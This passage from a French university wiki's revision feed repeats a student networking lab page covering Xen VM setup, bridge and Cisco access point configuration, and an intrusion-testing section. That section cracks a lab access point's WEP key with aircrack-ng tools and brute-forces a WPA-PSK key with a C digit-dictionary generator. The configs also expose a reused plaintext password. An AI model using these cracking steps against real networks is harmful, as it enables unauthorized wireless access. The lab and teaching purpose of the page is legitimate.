Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56363</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56363"/>
				<updated>2021-11-12T12:30:24Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
	int x = 0;&lt;br /&gt;
	for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
		printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56362</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56362"/>
				<updated>2021-11-12T12:27:00Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
